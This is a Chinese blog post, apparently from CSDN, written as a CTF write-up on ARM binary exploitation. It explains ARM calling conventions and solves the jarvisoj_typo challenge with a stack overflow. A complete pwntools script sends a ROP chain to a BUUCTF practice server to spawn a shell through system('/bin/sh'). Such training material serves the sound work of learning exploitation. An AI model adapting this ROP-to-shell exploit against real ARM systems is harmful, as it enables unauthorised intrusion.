ARM PWN

最新推荐文章于 2024-05-08 09:38:19 发布
最新推荐文章于 2024-05-08 09:38:19 发布
阅读量260 收藏 1
点赞数
分类专栏: pwn CTF BUUCTF 文章标签: arm linux python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/126298210
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

arm 下的函数调用约定

函数的第 1 ~ 4 个参数分别保存在 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡,函数的返回值保存在 r0 中

b/bl 等指令实现跳转;
pc 寄存器相当于 x86 的 eip,保存下一条指令的地址

例题jarvisoj_typo

ida发现根本没有主函数,和平常x86和x64架构不同,ida很难分析,我们可以通过gdb来分析
异构pwn环境搭建
在这里插入图片描述
经分析程序必须先输入回车,才能进入下一步
在这里插入图片描述
之后不管深入什么都会报错
因为程序未开启canary,我们可以猜测是栈溢出,且程序是静态链接,可以找到system地址和/bin/sh地址,
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

通过binsh字符串找到system地址
利用cyclic 200生成200个随机字符找偏移
在这里插入图片描述
在这里插入图片描述
输入c继续执行
在这里插入图片描述
在这里插入图片描述
找到偏移为112

exp

from pwn import *
context(endian='little',os='linux',arch='arm',log_level='debug') 
sh = remote('node4.buuoj.cn',29502)
#sh = process(["qemu-arm","./typo"])
sl      = lambda data               :sh.sendline(data)
overlength = 112
binsh = 0x06C384
system = 0x000110B4
pop_r0_r4_pc = 0x00020904
payload = b"a"*overlength + p32(pop_r0_r4_pc) + p32(binsh)*2 + p32(system)
sl('\n')
sleep(0.01)
sl(payload)
sh.interactive()
tbsqigongzi
关注
专栏目录
arm pwn 初探
qq_36495104的博客
06-27 492
学习网站azeria-labs,这个网站里蛮多arm教程,有基础的arm汇编,还有arm exploit,还有如何使用ubuntu 构建树莓派虚拟机。 如何搭建arm pwn环境和下面要讲的如何利用arm pwn参考这篇文章 ARM64 调试环境搭建及 ROP 实战 题目地址 pwn 环境搭建 可以使用 apt 安装 arm 的动态库,然后用 qemu 运行,也可以安装一个树莓派虚拟机,做题直接参考先知的那篇文章,最简单 安装树莓派虚拟机 直接下载现成的 azeria-labs提供了装有树莓派虚拟机的ubu
ArmPwn学习
qq_40712959的博客
04-20 704
arm pwn练习 inctf2018_wARMup 程序逻辑 明显的栈溢出,但是只溢出了0x10个字节,很明显,需要栈迁移,但是在程序中,注意其调用read函数的汇编代码,如下,写如数据的缓冲区buf由R3寄存器重置,故若我们可以控制R3寄存器,则可以控制程序输入的位置,这里通过gadget(0x00010364 : pop {r3, pc})实现。 注意程序的endlog,如下图,可以发现,程序的SP由R11寄存器控制,而由于栈溢出漏洞的存在,我们可以控制R11,故我们可以通过控制R11,将其指向b
Arm pwn学习
蚁景网安学院
08-07 600
刚刚开始学习ARM pwn,下面如有错误,希望各位大佬多多包han,多多包涵。先介绍下 Arm的一些常见指令那就先来Arm 三操作数指令LDRBR0,[R1,#-1]#...
ARM PWN基础教程
蚁景网安学院
07-19 551
在CTF比赛中,我们所能接触到的大部分都是x86 x86_64架构的题目,而在我开始接触IOT方向的研究以后发现智能设备所用到的则是ARM和MIPS架构为主。本篇文章在介绍前置知识的基础上通过CTF的ARM架构类型题带读者更好的入门ARM PWN的世界。.........
ARM pwn 入门 (1)
CoLin的pwn小屋
11-02 1168
ARM pwn 入门(1) —— 前置知识
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编语言编写代码,以实现对硬件资源的直接控制。对于PWN接口的使用,汇编语言通常能提供...
PWN.rar_PWN
09-24
Keil uVision3是一款流行的嵌入式系统开发工具,用于编写和调试基于ARM、Cortex-M、Cortex-R以及Cortex-A系列微控制器的软件。它提供了一个集成开发环境(IDE),包括源代码编辑器、项目管理、编译器、链接器、调试...
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn
shanghai2018_baby_arm
06-03
arm64架构pwn
Pwn入门指北1
08-03
1. 各大主流平台汇编语言,例如x86与arm 2. C语言 5. 计算机组成原理 6. 计算机操作系统 7. 编译原理 1 . 关于环境 2 . 面向萌新的一
ARM pwn 入门 (2)
CoLin的pwn小屋
11-02 1257
ARM pwn 入门 (2) —— 第一道ARM pwn
ARM pwn 入门 (3)
CoLin的pwn小屋
11-06 1074
ARM pwn 入门 (3)——ROP emporium 第1-2题
PowerPC&ARM架构下的pwn 初探
S4n_v1的博客
04-13 791
PowerPC&ARM&AARCH64 架构学习(Ubuntu16 + 运行环境搭建 + 调试 + 指令集 + 赛题复现 2023 数字中国创新大赛 数字网络安全人才挑战赛 - pwn起源 buu - jarvisoj_typo
CTF pwn -- ARM架构pwn题详解
lifanxin的博客
05-14 2842
arm架构pwn题详解概述环境搭建使用QEMU使用gdb-multiarchARM架构基本知识一道例题参考博客总结 概述   ARM架构过去称作进阶精简指令集机器(Advanced RISC Machine,更早称作:Acorn RISC Machine),是一个32位精简指令集(RISC)处理器架构,其广泛地使用在许多嵌入式系统设计。由于节能的特点,ARM处理器非常适用于移动通讯领域,符合其主要设计目标为低耗电的特性。因此我们常用的手机、平板等移动设备都是采用ARM体系架构的,因此CTF中不可避免也会出
ARM pwn 环境搭建和使用
qq_60209620的博客
03-30 328
qemu是一款可执行硬件虚拟化的虚拟机,与他类似的还有Bochs、PearPC,之前我们已经安装完了gdb-multiarch,现在来试试怎么调试程序。这个文件夹,该文件夹即对应刚安装好的arm32位libc库.到这里了,我们就能直接运行静态链接arm的程序了,拿的。但qemu具有高速(配合KVM)、跨平台的特性。例子:调试32位的静态程序。但是这里我们只用下载。
Xman2018冬令营选拔赛arm-pwn
Peanuts
01-05 844
arm32-pwn从环境搭建到实战 关于armpwn还是比较令人头疼的,首先汇编比较难看懂,其次就是ida反编译出来的东西还会有错误,比如之后要讲的题目中栈的分布就和ida解析出来的完全不一样。那么先来看一看环境的搭建。之前有人发过完整的64的环境搭建,32的环境搭建和实战还是有一些不同的 环境搭建 环境的搭建应该是现在arm题目中比较麻烦的一个点。 安装qemu apt-get in...
探索ARM平台漏洞利用:ARMPwn项目详解
最新发布
gitblog_00036的博客
05-08 382
探索ARM平台漏洞利用:ARMPwn项目详解 项目地址:https://gitcode.com/saelo/armpwn 在这个数字化的时代,安全无处不在。对于软件开发者和安全研究人员来说,理解并应对内存腐败攻击是至关重要的。这就是ARMPwn项目的初衷——一个专为在ARM平台上训练和学习内存腐蚀利用的开源工具。这个项目由CTF团队成员精心准备,旨在帮助你提升在嵌入式系统的安全技能。 项目简介 A...
armpwn环境搭建
qq_51474381的博客
05-02 306
ubantu安装报错太多,直接用deepin最新版搭建,十分顺利。 1.准备git,gdb 和 gdb-multiarch sudo apt-get update sudo apt-get install git gdb gdb-multiarch 2.安装 gdb 的插件 pwndbg git clone https://github.com/pwndbg/pwndbg cd pwndbg ./setup.sh 3.安装pwntools(可能要先安装pip) sudo pip insta
ARM PWN:Shanghai2018_baby_arm详细讲解
hollk’s blog
07-06 1345
这是一道aarch64的PWN题目,依然觉得和x86没什么太大的区别,aarch64程序中也存在类似x86下csu_init的gadget。有区别的地方在于aarch64寄存器和汇编指令集,如果x86汇编指令集比较熟悉的话,找一篇关于aarch64的,看一看就很容易理解了
ubuntu20.04 PWN
08-14
- *1* *2* *3* [ubuntu20.04 PWN(含x86、ARM、MIPS)环境搭建](https://blog.csdn.net/qq_41202237/article/details/118188924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值